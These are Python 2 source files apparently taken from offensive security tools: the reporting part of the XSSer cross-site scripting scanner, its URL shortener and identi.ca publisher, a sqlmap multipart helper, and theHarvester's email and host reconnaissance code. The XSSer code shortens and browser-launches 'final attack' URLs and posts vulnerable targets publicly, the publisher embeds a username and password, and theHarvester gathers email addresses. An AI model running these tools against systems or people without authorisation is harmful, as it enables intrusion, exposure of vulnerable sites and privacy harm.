if self.options.finalpayload or self.options.finalremote or self.options.b64 or self.options.dos:
shorturl = shortener.process_url(real_attack_url)
self.report("[/] Shortered URL (Final Attack):", shorturl)
else:
shorturl = shortener.process_url(dest_url)
self.report("[/] Shortered URL (Injection):", shorturl)
return real_attack_url
def report(self, *args):
args = list(map(lambda s: str(s), args))
formatted = " ".join(args)
if not self.options.silent:
print(formatted)
for reporter in self._reporters:
reporter.post(formatted)
def print_results(self):
"""
Print results from an attack.
"""
self.report('\n' + '='*75)
total_injections = len(self.hash_found) + len(self.hash_notfound)
if len(self.hash_found) + len(self.hash_notfound) == 0:
pass
else:
self.report("[*] Final Results:")
self.report('='*75 + '\n')
self.report("- Injections:", total_injections)
self.report("- Failed:", len(self.hash_notfound))
self.report("- Sucessfull:", len(self.hash_found))
try:
_accur = len(self.hash_found) * 100 / total_injections
except ZeroDivisionError:
_accur = 0
self.report("- Accur: %s %%\n" % _accur)
if not len(self.hash_found) and self.hash_notfound:
self.report('='*75 + '\n')
pass
else:
self.report('='*75)
self.report("[*] List of possible XSS injections:")
self.report('='*75 + '\n')
#XXX better control of flow
for line in self.hash_found:
attack_url = self.apply_postprocessing(line[0], line[1], line[2], line[3], line[4], line[5], line[6])
if self.options.fileoutput:
fout = open("XSSlist.dat", "a")
if line[2] == "xsr":
self.xsr_founded = self.xsr_founded + 1
xsr_vulnerable_host = [{"payload":str(line[4]), "target":str(line[6])}]
if xsr_vulnerable_host[0]["payload"] == line[4] and xsr_vulnerable_host[0]["target"] == line[6] and self.xsr_founded > 1:
self.xsr_founded = self.xsr_founded - 1
pass
else:
self.report("[I] Target:", line[6])
self.report("[+] Injection:",str(line[6])+"/"+str(line[4]), "[", Curl.referer, "]")
self.report("[!] Special:", "This injection looks like a Cross Site Referer Scripting")
self.report("[-] Method:", line[2])
self.report('-'*50, "\n")
if self.options.fileoutput:
fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
fout.write("---------------------" + "\n")
fout.write("[I] Target: " + line[6] + "\n")
fout.write("[+] Injection: " + str(line[6])+"/"+str(line[4]) + "[" + Curl.referer + "]" + "\n")
fout.write("[!] Special: " + "This injections looks like a Cross Site Referer Scripting" + "\n")
fout.write("[-] Method: " + line[2] + "\n" + '-'*50 +"\n")
elif line[2] == "xsa":
self.xsa_founded = self.xsa_founded + 1
xsa_vulnerable_host = [{"payload":str(line[4]), "target":str(line[6])}]
if xsa_vulnerable_host[0]["payload"] == line[4] and xsa_vulnerable_host[0]["target"] == line[6] and self.xsa_founded > 1:
self.xsa_founded = self.xsa_founded - 1
pass
else:
self.report("[I] Target:", line[6])
self.report("[+] Injection:",str(line[6])+"/"+str(line[4]),
"[", Curl.agent, "]")
self.report("[!] Special:", "This injection looks like a Cross Site Agent Scripting")
self.report("[-] Method:", line[2])
self.report('-'*50, "\n")
if self.options.fileoutput:
fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
fout.write("---------------------" + "\n")
fout.write("[I] Target: " + line[6] + "\n")
fout.write("[+] Injection: "+ str(line[6])+"/"+str(line[4]) + "[" + Curl.agent + "]" + "\n")
fout.write("[!] Special: " + "This injection looks like a Cross Site Agent Scripting " + "\n")
fout.write("[-] Method: " + line[2] + "\n" + '-'*50 +"\n")
elif line[2] == "coo":
self.coo_founded = self.coo_founded + 1
coo_vulnerable_host = [{"payload":str(line[4]), "target":str(line[6])}]
if coo_vulnerable_host[0]["payload"] == line[4] and coo_vulnerable_host[0]["target"] == line[6] and self.coo_founded > 1:
self.coo_founded = self.coo_founded - 1
pass
else:
self.report("[I] Target:", line[6])
self.report("[+] Injection:",str(line[6])+"/"+str(line[4]),"[",
Curl.cookie, "]")
self.report("[!] Special:", "This injection looks like a Cross Site Cookie Scripting")
self.report("[-] Method:", line[2])
self.report('-'*50, "\n")
if self.options.fileoutput:
fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
fout.write("---------------------" + "\n")
fout.write("[I] Target: " + line[6] + "\n")
fout.write("[+] Injection: "+ str(line[6])+"/"+str(line[4]) + "[" + Curl.cookie + "]" + "\n")
fout.write("[!] Special: " + "This injection looks like a Cross Site Cookie Scripting " + "\n")
fout.write("[-] Method: " + line[2] + "\n" + '-'*50 +"\n")
elif line[1] == "[Data Control Protocol Injection]":
self.dcp_founded = self.dcp_founded + 1
self.report("[I] Target:", line[6])
self.report("[+] Injection:", str(line[6])+"/"+str(line[4]),
"[", line[5]["payload"] , "]")
self.report("[!] Special:", "This injection looks like a Data Control Protocol flaw")
if self.options.finalpayload or self.options.finalremote:
self.report("[*] Final Attack: ", attack_url)
else:
self.report("[*] Final Attack: ", line[5]["payload"])
self.report("[-] Method: dcp")
self.report('-'*50, "\n")
if self.options.fileoutput:
fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
fout.write("---------------------" + "\n")
fout.write("[I] Target: " + line[6] + "\n")
fout.write("[+] Injection: " + str(line[6]) + "/" + str(line[4]) + "[" + line[5]["payload"] + "]" + "\n")
fout.write("[!] Special: " + "This injection looks like a Data Control Protocol flaw" + "\n")
if self.options.finalpayload or self.options.finalremote:
fout.write("[*] Final Attack: " + attack_url + "\n")
else:
fout.write("[*] Final Attack: " + line[5]["payload"] + "\n")
fout.write("[-] Method: dcp" + "\n" + '-'*50 +"\n")
elif line[1] == "[Document Object Model Injection]":
self.dom_founded = self.dom_founded + 1
self.report("[I] Target:", line[6])
self.report("[+] Injection:", str(line[0]))
self.report("[!] Special:", "This injection looks like a Document Object Model flaw")
if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
self.report("[*] Final Attack: ", attack_url)
else:
pass
self.report("[-] Method: dom")
self.report('-'*50, "\n")
if self.options.fileoutput:
fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
fout.write("---------------------" + "\n")
fout.write("[I] Target: " + line[6] + "\n")
fout.write("[+] Injection: " + str(line[0]) + "\n")
fout.write("[!] Special: " + "This injection looks like a Document Object Model flaw" + "\n")
if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
fout.write("[*] Final Attack: " + attack_url + "\n")
else:
pass
fout.write("[-] Method: dom" + "\n" + '-'*50 +"\n")
elif line[1] == "[Induced Injection]":
self.httpsr_founded = self.httpsr_founded +1
self.report("[I] Target:", line[6])
self.report("[+] Injection:", str(line[0]))
self.report("[!] Special:", "This injection looks like a HTTP Splitting Response")
if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
self.report("[*] Final Attack: ", attack_url)
else:
pass
self.report("[-] Method: ind")
self.report('-'*50, "\n")
if self.options.fileoutput:
fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
fout.write("---------------------" + "\n")
fout.write("[I] Target: " + line[6] + "\n")
fout.write("[+] Injection: " + str(line[0]) + "\n")
fout.write("[!] Special: " + "This injection looks like a HTTP Splitting Response" + "\n")
if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
fout.write("[*] Final Attack: " + attack_url + "\n")
else:
pass
fout.write("[-] Method: ind" + "\n" + '-'*50 +"\n")
elif line[5]["browser"] == "[hashed_precheck_system]":
self.false_positives = self.false_positives + 1
self.report("[I] Target:", line[6])
self.report("[+] Injection:", str(line[0]))
self.report("[!] Checker: This injection looks like a -false positive- result!. Verify it manually!")
self.report("[-] Method: hash")
self.report('-'*50, "\n")
if self.options.fileoutput:
fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
fout.write("---------------------" + "\n")
fout.write("[I] Target: " + line[6] + "\n")
fout.write("[+] Injection: " + str(line[0]) + "\n")
fout.write("[!] Checker: This injection looks like a -false positive- result!. Verify it manually!" + "\n")
fout.write("[-] Method: hash" + "\n" + '-'*50 +"\n")
elif line[5]["browser"] == "[manual_injection]":
self.manual_founded = self.manual_founded + 1
self.report("[I] Target:", line[6])
self.report("[+] Injection:", str(line[0]))
self.report("[-] Method: manual")
self.report('-'*50, "\n")
if self.options.fileoutput:
fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
fout.write("---------------------" + "\n")
fout.write("[I] Target: " + line[6] + "\n")
fout.write("[+] Injection: " + str(line[0]) + "\n")
fout.write("[-] Method: manual" + "\n" + '-'*50 +"\n")
elif line[5]["browser"] == "[Heuristic test]":
if str(line[5]["payload"]).strip('XSS') == "\\" or str(line[5]["payload"]).strip('XSS') == "/" or str(line[5]["payload"]).strip('XSS') == ">" or str(line[5]["payload"]).strip('XSS') == "<" or str(line[5]["payload"]).strip('XSS') == ";" or str(line[5]["payload"]).strip('XSS') == "'" or str(line[5]["payload"]).strip('XSS') == '"' or str(line[5]["payload"]).strip('XSS') == "=":
self.report("[I] Target:", line[6])
self.report("[+] Parameter(s):", "[",
str(line[5]["payload"]).strip('XSS') , "]")
self.report("[!] Special:", "This parameter(s) looks like is NOT -completly- FILTERED on target code")
self.report("[-] Method: heuristic")
self.report('-'*50, "\n")
if self.options.fileoutput:
fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
fout.write("---------------------" + "\n")
fout.write("[I] Target: " + line[6] + "\n")
fout.write("[+] Parameter(s): " + "[" + str(line[5]["payload"]).strip('XSS') + "]" + "\n")
fout.write("[!] Special: " + "This parameter(s) looks like is NOT -completly- FILTERED on target code" + "\n")
fout.write("[-] Method: heuristic" + "\n" + '-'*50 +"\n")
else:
pass
else:
self.auto_founded = self.auto_founded + 1
self.report("[I] Target:", line[6])
self.report("[+] Injection:", line[0])
if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
self.report("[*] Final Attack: ", attack_url)
else:
pass
self.report("[-] Method: xss")
self.report("[-] Browsers:", line[1], "\n", '-'*50, "\n")
if self.options.fileoutput:
fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
fout.write("---------------------" + "\n")
fout.write("[I] Target: " + line[6] + "\n")
fout.write("[+] Injection: " + line[0] + "\n")
if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
fout.write("[*] Final Attack: " + attack_url + "\n")
else:
pass
fout.write("[-] Method: xss" + "\n")
fout.write("[-] Browsers: "+ line[1] + "\n" + '-'*50 + "\n")
if self.options.tweet:
# XXX recover sns and username automatically
self.report("[!] Trying to publish on: " + self.sn_service + "/" + self.sn_username)
if self.options.fileoutput:
fout.write("[!] Published on: " + self.sn_service + "/" + self.sn_username + "\n")
fout.write("="*75 + "\n")
if self.options.launch_browser:
if self.options.dcp:
#XXX implement DCP autolauncher
self.report("\n[@] DCP autolauncher not implemented, yet. (http://docs.python.org/library/webbrowser.html)")
self.report("[!] Aborting all launching process!!. If you want to 'auto-launch' other results, try without --Dcp option\n")
self.report("[I] If you have some DCP success injections discovered, try to open -manually- these results in the website of your target. You will see that works! ;)\n")
else:
if attack_url == "":
pass
else:
self._webbrowser.open(attack_url)
# heuristic always with statistics
if self.options.heuristic:
self.options.statistics = True
# some statistics reports
if self.options.statistics:
# heuristic test results
if self.options.heuristic:
self.report('='*75)
self.report("[*] Heuristic:")
self.report('='*75)
self.report('-'*50)
self.report(' ', " <not-filt>", " <filtered>", " =" , " ASCII",
" +", " UNE/HEX", " +", " DEC")
# semicolon results
heuris_semicolon_total_founded = self.heuris_semicolon_notfounded + self.heuris_une_semicolon_founded + self.heuris_dec_semicolon_founded
self.report('; ', " ", self.heuris_semicolon_founded, " ", heuris_semicolon_total_founded, " ",
self.heuris_semicolon_notfounded, " ",
self.heuris_une_semicolon_founded, " ",
self.heuris_dec_semicolon_founded)
# backslash results
heuris_backslash_total_founded = self.heuris_backslash_notfounded + self.heuris_une_backslash_founded + self.heuris_dec_backslash_founded
self.report('\\ ', " ", self.heuris_backslash_founded, " ", heuris_backslash_total_founded, " ",
self.heuris_backslash_notfounded, " ",
self.heuris_une_backslash_founded, " ",
self.heuris_dec_backslash_founded)
# slash results
heuris_slash_total_founded = self.heuris_slash_notfounded + self.heuris_une_slash_founded + self.heuris_dec_slash_founded
self.report("/ ", " ", self.heuris_slash_founded, " ",
heuris_slash_total_founded, " ",
self.heuris_slash_notfounded, " ",
self.heuris_une_slash_founded, " ",
self.heuris_dec_slash_founded)
# minor results
heuris_minor_total_founded = self.heuris_minor_notfounded + self.heuris_une_minor_founded + self.heuris_dec_minor_founded
self.report("< ", " ", self.heuris_minor_founded, " ",
heuris_minor_total_founded, " ",
self.heuris_minor_notfounded, " ",
self.heuris_une_minor_founded, " ",
self.heuris_dec_minor_founded)
# mayor results
heuris_mayor_total_founded = self.heuris_mayor_notfounded + self.heuris_une_mayor_founded + self.heuris_dec_mayor_founded
self.report("> ", " ", self.heuris_mayor_founded, " ",
heuris_mayor_total_founded, " ",
self.heuris_mayor_notfounded, " ",
self.heuris_une_mayor_founded, " ",
self.heuris_dec_mayor_founded)
# doublecolon results
heuris_doublecolon_total_founded = self.heuris_doublecolon_notfounded + self.heuris_une_doublecolon_founded + self.heuris_dec_doublecolon_founded
self.report('" ', " ", self.heuris_doublecolon_founded, " ", heuris_doublecolon_total_founded, " ",
self.heuris_doublecolon_notfounded, " ",
self.heuris_une_doublecolon_founded, " ",
self.heuris_dec_doublecolon_founded)
# colon results
heuris_colon_total_founded = self.heuris_colon_notfounded + self.heuris_une_colon_founded + self.heuris_dec_colon_founded
self.report("' ", " ", self.heuris_colon_founded, " ",
heuris_colon_total_founded, " ",
self.heuris_colon_notfounded, " ",
self.heuris_une_colon_founded, " ",
self.heuris_dec_colon_founded)
# equal results
heuris_equal_total_founded = self.heuris_equal_notfounded + self.heuris_une_equal_founded + self.heuris_dec_equal_founded
self.report("= ", " ", self.heuris_equal_founded, " ",
heuris_equal_total_founded, " ",
self.heuris_equal_notfounded, " ",
self.heuris_une_equal_founded, " ",
self.heuris_dec_equal_founded)
self.report('-'*70)
total_heuris_founded = heuris_semicolon_total_founded + heuris_backslash_total_founded + heuris_slash_total_founded + heuris_minor_total_founded + heuris_mayor_total_founded + heuris_doublecolon_total_founded + heuris_colon_total_founded + heuris_equal_total_founded
total_heuris_params = total_heuris_founded + self.heuris_semicolon_founded + self.heuris_backslash_founded + self.heuris_slash_founded + self.heuris_minor_founded + self.heuris_mayor_founded + self.heuris_doublecolon_founded + self.heuris_colon_founded + self.heuris_equal_founded
try:
_accur = total_heuris_founded * 100 / total_heuris_params
except ZeroDivisionError:
_accur = 0
self.report('Target(s) Filtering Accur: %s %%' % _accur)
self.report('-'*70)
# statistics block
if len(self.hash_found) + len(self.hash_notfound) == 0:
pass
else:
self.report('='*75)
self.report("[*] Statistic:")
self.report('='*75)
test_time = datetime.datetime.now() - self.time
self.report('-'*50)
self.report("Test Time Duration: ", test_time)
self.report('-'*50 )
total_connections = self.success_connection + self.not_connection + self.forwarded_connection + self.other_connection
self.report("Total Connections:", total_connections)
self.report('-'*25)
self.report("200-OK:" , self.success_connection , "|", "404:" ,
self.not_connection , "|" , "503:" ,
self.forwarded_connection , "|" , "Others:",
self.other_connection)
try:
_accur = self.success_connection * 100 / total_connections
except ZeroDivisionError:
_accur = 0
self.report("Connec: %s %%" % _accur)
self.report('-'*50)
total_payloads = self.check_positives + self.manual_injection + self.auto_injection + self.dcp_injection + self.dom_injection + self.xsa_injection + self.xsr_injection + self.coo_injection
self.report("Total Payloads:", total_payloads)
self.report('-'*25)
self.report("Checker:", self.check_positives, "|", "Manual:",
self.manual_injection, "|" , "Auto:" ,
self.auto_injection ,"|", "DCP:",
self.dcp_injection, "|", "DOM:", self.dom_injection,
"|", "Induced:", self.httpsr_injection, "|" , "XSR:",
self.xsr_injection, "|", "XSA:",
self.xsa_injection , "|", "COO:",
self.coo_injection)
self.report('-'*50)
self.report("Total Injections:" ,
len(self.hash_notfound) + len(self.hash_found))
self.report('-'*25)
self.report("Failed:" , len(self.hash_notfound), "|",
"Sucessfull:" , len(self.hash_found))
try:
_accur = len(self.hash_found) * 100 / total_injections
except ZeroDivisionError:
_accur = 0
self.report("Accur : %s %%" % _accur)
self.report('-'*25)
total_discovered = self.false_positives + self.manual_founded + self.auto_founded + self.dcp_founded + self.dom_founded + self.xsr_founded + self.xsa_founded + self.coo_founded
self.report("Total Discovered:", total_discovered)
self.report('-'*25)
self.report("Checker:", self.false_positives, "|",
"Manual:",self.manual_founded, "|", "Auto:",
self.auto_founded, "|", "DCP:", self.dcp_founded,
"|", "DOM:", self.dom_founded, "|", "Induced:",
self.httpsr_founded, "|" , "XSR:", self.xsr_founded,
"|", "XSA:", self.xsa_founded, "|", "COO:",
self.coo_founded)
self.report('-'*50)
self.report("False positives:", self.false_positives, "|",
"Vulnerables:",
total_discovered - self.false_positives)
self.report('-'*25)
# efficiency ranking:
# algor= vulnerables + false positives - failed * extras
# extras:
## 1 vuln -> identi.ca: +10000
## >3 vuln -> 1 test: +4500
## 1 vuln -> 1 test: +500
## >100 payloads: +150
## proxy and heuristic: +100
## final payload injected: +100
## --Cem and --Doo: +75
## manual payload injected and --Dcp: +25
## checker: +10
mana = 0
if self.hash_found and self.options.tweet:
mana = mana + 10000
if self.hash_found > 3:
mana = mana + 4500
if self.hash_found == 1:
mana = mana + 500
if total_payloads > 100:
mana = mana + 150
if self.options.proxy:
mana = mana + 100
if self.options.heuristic:
mana = mana + 100
if self.options.finalpayload or self.options.finalremote:
mana = mana + 100
if self.options.Cem or self.options.Doo:
mana = mana + 75
if self.options.heuristic:
mana = mana + 50
if self.options.script and not self.options.fuzz:
mana = mana + 25
if self.options.followred and self.options.fli:
mana = mana + 25
if self.options.dcp:
mana = mana + 25
if self.options.hash:
mana = mana + 10
mana = (len(self.hash_found) * mana) + mana -4500
# enjoy it :)
self.report("Mana:", mana)
self.report("-"*50)
#self.report('='*75 + '\n')
# end statistics block
c = Curl()
if not len(self.hash_found) and self.hash_notfound:
if self.options.hash:
self.report("[!] Checker: looks like your target(s) does not repeat all received code.\n")
if self.options.fuzz or self.options.dcp or self.options.script:
self.report("[I] Could not find any vulnerability!. Try another combination or hack it -manually- :)\n")
else:
self.report("[I] Could not find any vulnerability!. Try another combination or hack it -manually- :)\n")
self.report('='*75 + '\n')
if self.options.fileoutput:
fout = open("XSSlist.dat", "a")
fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
fout.write("---------------------" + "\n")
fout.write("[!] Not reported 'positive' results for: \n" + "[-] " + str('\n[-] '.join([u[0] for u in self.hash_notfound])) + "\n")
fout.write("="*75 + "\n")
fout.close()
else:
# some exits and info for some bad situations:
if len(self.hash_found) + len(self.hash_notfound) == 0 and not Exception:
self.report("\nXSSer cannot send data :( ... maybe is -something- blocking our connections!?\n")
if len(self.hash_found) + len(self.hash_notfound) == 0 and self.options.crawling:
self.report("\nCrawlering system cannot recieve feedback from 'mosquitoes' on target host... try again :(\n")
#if len(self.hash_found) + len(self.hash_notfound) == 0 and c.info()["http-code"] != "200":
# self.report("\nTarget responses with different HTTP code to: 200 [" + c.info()["http-code"] + "] ... cannot inject! :(\n")
#self.report('='*75 + '\n')
# print results to xml file
if self.options.filexml:
xml_report_results = xml_reporting(self)
xml_report_results.print_xml_results(self.options.filexml)
# publish discovered vulnerabilities
if self.options.tweet and self.hash_found:
try:
shortener = ShortURLReservations('is.gd')
shorturl_host = shortener.process_url(str(line[0]))
for line in self.hash_found:
sns_publish_results = publisher(self)
tags = '#xss '
if not self.options.tt:
msg = tags + 'vulnerable target: ' + shorturl_host
else:
tags = tags + self.options.tt
msg = tags + ' vulnerable target: ' + shorturl_host
username = self.sn_username
password = <PASSWORD>password
url = self.sn_url
sns_publish_results.send_to_identica(msg, username, password, url)
except:
self.report("\n[I] Error publishing some discovered XSS injections\n")
pass
if __name__ == "__main__":
app = xsser()
options = app.create_options()
if options:
app.set_options(options)
app.run()
app.land(True)
```
#### File: XSSer/post/shorter.py
```python
import urllib
import pycurl
from cStringIO import StringIO
from BeautifulSoup import BeautifulSoup
class ShortURLReservations(object):
#options = [['-foo!', 'do stuff']]
def __init__(self, service='tinyurl'):
self._service = service
self._parse_shortener()
self._extra = {}
def _parse_shortener(self):
"""
List of valid links shorterers
"""
if self._service == 'tinyurl' or not self._service:
self._url = 'http://tinyurl.com/create.php'
self._par = 'url'
self._method = 'get'
elif self._service == 'is.gd':
self._url = 'http://is.gd/create.php'
self._par = 'url'
self._method = 'post'
def process_url(self, url):
dest = urllib.urlencode({self._par: url})
out = StringIO()
c = pycurl.Curl()
if self._method == 'post':
c.setopt(c.POST, 1)
c.setopt(c.POSTFIELDS, dest)
target = self._url
else:
target = self._url + '?' + dest
c.setopt(c.URL, target)
c.setopt(c.FOLLOWLOCATION, 1)
c.setopt(c.WRITEFUNCTION, out.write)
c.perform()
c.close()
soup = BeautifulSoup(out.getvalue())
if self._service == 'tinyurl':
return soup.findAll('blockquote')[1].findAll('a')[0]['href']
elif self._service == 'is.gd':
return soup.findAll('input', {'id':'short_url'})[0]['value']
if __name__ == "__main__":
shortener = ShortURLReservations('tinyurl')
print shortener.process_url('http://slashdot.org?foo')
shortener = ShortURLReservations('is.gd')
print shortener.process_url('http://slashdot.org?foo')
```
#### File: xsser/XSSer/publish.py
```python
import urllib2, urllib
class publisher(object):
def __init__(self, xsser):
# initialize main XSSer
self.instance = xsser
def send_to_identica(self, msg, username, password, url=None):
if url is None:
url = "http://identi.ca/api/statuses/update.xml"
data = urllib.urlencode({'status':msg})
passman = urllib2.HTTPPasswordMgrWithDefaultRealm()
passman.add_password(None, url, username, password)
authhandler = urllib2.HTTPBasicAuthHandler(passman)
opener = urllib2.build_opener(authhandler)
urllib2.install_opener(opener)
pagehandle = urllib2.urlopen(url, data)
print pagehandle
if __name__ == "__main__":
publish = publisher(object)
publish.send_to_identica('XSSer v1.6b -Grey Swarm!- Website: http://xsser.sf.net', 'xsserbot01', '8vnVw8wvs', 'http://identi.ca/api/statuses/update.xml')
```
#### File: xsser/XSSer/reporter.py
```python
"""
Base class for objects wanting to receive report information from XSSer.
It implements all callbacks so you will be safe ;)
"""
class XSSerReporter(object):
def start_attack(self):
pass
def end_attack(self):
pass
def mosquito_crashed(self, dest_url, reason="unknown"):
pass
def report_state(self, state):
pass
def add_link(self, orig_url, dest_url):
pass
def report_error(self, error_msg):
pass
def start_token_check(self, dest_url):
pass
def start_crawl(self, dest_url):
pass
def post(self, msg):
pass
def token_arrived(self, token):
pass
def add_checked(self, dest_url):
pass
def add_success(self, dest_url):
pass
def add_failure(self, dest_url):
pass
```
#### File: thirdparty/multipart/multipartpost.py
```python
import mimetools
import mimetypes
import os
import stat
import StringIO
import sys
import urllib
import urllib2
from lib.core.exception import SqlmapDataException
class Callable:
def __init__(self, anycallable):
self.__call__ = anycallable
# Controls how sequences are uncoded. If true, elements may be given
# multiple values by assigning a sequence.
doseq = 1
class MultipartPostHandler(urllib2.BaseHandler):
handler_order = urllib2.HTTPHandler.handler_order - 10 # needs to run first
def http_request(self, request):
data = request.get_data()
if data is not None and type(data) != str:
v_files = []
v_vars = []
try:
for(key, value) in data.items():
if isinstance(value, file) or hasattr(value, 'file') or isinstance(value, StringIO.StringIO):
v_files.append((key, value))
else:
v_vars.append((key, value))
except TypeError:
systype, value, traceback = sys.exc_info()
raise SqlmapDataException, "not a valid non-string sequence or mapping object", traceback
if len(v_files) == 0:
data = urllib.urlencode(v_vars, doseq)
else:
boundary, data = self.multipart_encode(v_vars, v_files)
contenttype = 'multipart/form-data; boundary=%s' % boundary
#if (request.has_header('Content-Type') and request.get_header('Content-Type').find('multipart/form-data') != 0):
# print "Replacing %s with %s" % (request.get_header('content-type'), 'multipart/form-data')
request.add_unredirected_header('Content-Type', contenttype)
request.add_data(data)
return request
def multipart_encode(vars, files, boundary=None, buf=None):
if boundary is None:
boundary = mimetools.choose_boundary()
if buf is None:
buf = ''
for (key, value) in vars:
if key is not None and value is not None:
buf += '--%s\r\n' % boundary
buf += 'Content-Disposition: form-data; name="%s"' % key
buf += '\r\n\r\n' + value + '\r\n'
for (key, fd) in files:
file_size = os.fstat(fd.fileno())[stat.ST_SIZE] if isinstance(fd, file) else fd.len
filename = fd.name.split('/')[-1] if '/' in fd.name else fd.name.split('\\')[-1]
try:
contenttype = mimetypes.guess_type(filename)[0] or 'application/octet-stream'
except:
# Reference: http://bugs.python.org/issue9291
contenttype = 'application/octet-stream'
buf += '--%s\r\n' % boundary
buf += 'Content-Disposition: form-data; name="%s"; filename="%s"\r\n' % (key, filename)
buf += 'Content-Type: %s\r\n' % contenttype
# buf += 'Content-Length: %s\r\n' % file_size
fd.seek(0)
buf = str(buf) if not isinstance(buf, unicode) else buf.encode("utf8")
buf += '\r\n%s\r\n' % fd.read()
buf += '--%s--\r\n\r\n' % boundary
return boundary, buf
multipart_encode = Callable(multipart_encode)
https_request = http_request
```
#### File: TheHarvester/discovery/pgpsearch.py
```python
import string
import httplib
import sys
import myparser
class search_pgp:
def __init__(self, word):
self.word = word
self.results = ""
self.server = "pgp.rediris.es:11371"
self.hostname = "pgp.rediris.es"
self.userAgent = "(Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
def process(self):
h = httplib.HTTP(self.server)
h.putrequest('GET', "/pks/lookup?search=" + self.word + "&op=index")
h.putheader('Host', self.hostname)
h.putheader('User-agent', self.userAgent)
h.endheaders()
returncode, returnmsg, headers = h.getreply()
self.results = h.getfile().read()
def get_emails(self):
rawres = myparser.parser(self.results, self.word)
return rawres.emails()
def get_hostnames(self):
rawres = myparser.parser(self.results, self.word)
return rawres.hostnames()
```
#### File: Dangerous/TheHarvester/theHarvester.py
```python
import string
import httplib
import sys
import os
from socket import *
import re
import getopt
try:
import requests
except:
print "Request library not found, please install it before proceeding\n"
sys.exit()
from discovery import *
from lib import htmlExport
from lib import hostchecker
print "\n*******************************************************************"
print "* *"
print "* | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ *"
print "* | __| '_ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *"
print "* | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | *"
print "* \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| *"
print "* *"
print "* TheHarvester Ver. 2.6 *"
print "* Coded by <NAME> *"
print "* Edge-Security Research *"
print "* <EMAIL> *"
print "*******************************************************************\n\n"
def usage():
comm = os.path.basename(sys.argv[0])
if os.path.dirname(sys.argv[0]) == os.getcwd():
comm = "./" + comm
print "Usage: theharvester options \n"
print " -d: Domain to search or company name"
print """ -b: data source: google, googleCSE, bing, bingapi, pgp, linkedin,
google-profiles, jigsaw, twitter, googleplus, all\n"""
print " -s: Start in result number X (default: 0)"
print " -v: Verify host name via dns resolution and search for virtual hosts"
print " -f: Save the results into an HTML and XML file"
print " -n: Perform a DNS reverse query on all ranges discovered"
print " -c: Perform a DNS brute force for the domain name"
print " -t: Perform a DNS TLD expansion discovery"
print " -e: Use this DNS server"
print " -l: Limit the number of results to work with(bing goes from 50 to 50 results,"
print " google 100 to 100, and pgp doesn't use this option)"
print " -h: use SHODAN database to query discovered hosts"
print "\nExamples:"
print " " + comm + " -d microsoft.com -l 500 -b google"
print " " + comm + " -d microsoft.com -b pgp"
print " " + comm + " -d microsoft -l 200 -b linkedin"
print " " + comm + " -d apple.com -b googleCSE -l 500 -s 300\n"
def start(argv):
if len(sys.argv) < 4:
usage()
sys.exit()
try:
opts, args = getopt.getopt(argv, "l:d:b:s:vf:nhcte:")
except getopt.GetoptError:
usage()
sys.exit()
start = 0
host_ip = []
filename = ""
bingapi = "yes"
dnslookup = False
dnsbrute = False
dnstld = False
shodan = False
vhost = []
virtual = False
limit = 100
dnsserver = ""
for opt, arg in opts:
if opt == '-l':
limit = int(arg)
elif opt == '-d':
word = arg
elif opt == '-s':
start = int(arg)
elif opt == '-v':
virtual = "basic"
elif opt == '-f':
filename = arg
elif opt == '-n':
dnslookup = True
elif opt == '-c':
dnsbrute = True
elif opt == '-h':
shodan = True
elif opt == '-e':
dnsserver = arg
elif opt == '-t':
dnstld = True
elif opt == '-b':
engine = arg
if engine not in ("google","googleCSE" , "linkedin", "pgp", "all", "google-profiles", "bing", "bingapi",
"yandex", "jigsaw", "dogpilesearch", "twitter", "googleplus", "yahoo", "baidu"):
usage()
print "Invalid search engine, try with: bing, google, linkedin, pgp, jigsaw, bingapi, google-profiles, dogpilesearch, twitter, googleplus, yahoo, baidu"
sys.exit()
else:
pass
if engine == "google":
print "[-] Searching in Google:"
search = googlesearch.search_google(word, limit, start)
search.process()
all_emails = search.get_emails()
all_hosts = search.get_hostnames()
if engine == "googleCSE":
print "[-] Searching in Google Custom Search:"
search = googleCSE.search_googleCSE(word, limit, start)
search.process()
search.store_results()
all_emails = search.get_emails()
all_hosts = search.get_hostnames()
if engine == "exalead":
print "[-] Searching in Exalead:"
search = exaleadsearch.search_exalead(word, limit, start)
search.process()
all_emails = search.get_emails()
all_hosts = search.get_hostnames()
elif engine == "bing" or engine == "bingapi":
print "[-] Searching in Bing:"
search = bingsearch.search_bing(word, limit, start)
if engine == "bingapi":
bingapi = "yes"
else:
bingapi = "no"
search.process(bingapi)
all_emails = search.get_emails()
all_hosts = search.get_hostnames()
elif engine == "yandex": # Not working yet
print "[-] Searching in Yandex:"
search = yandexsearch.search_yandex(word, limit, start)
search.process()
all_emails = search.get_emails()
all_hosts = search.get_hostnames()
elif engine == "pgp":
print "[-] Searching in PGP key server.."
search = pgpsearch.search_pgp(word)
search.process()
all_emails = search.get_emails()
all_hosts = search.get_hostnames()
elif engine == "jigsaw":
print "[-] Searching in Jigsaw.."
search = jigsaw.search_jigsaw(word, limit)
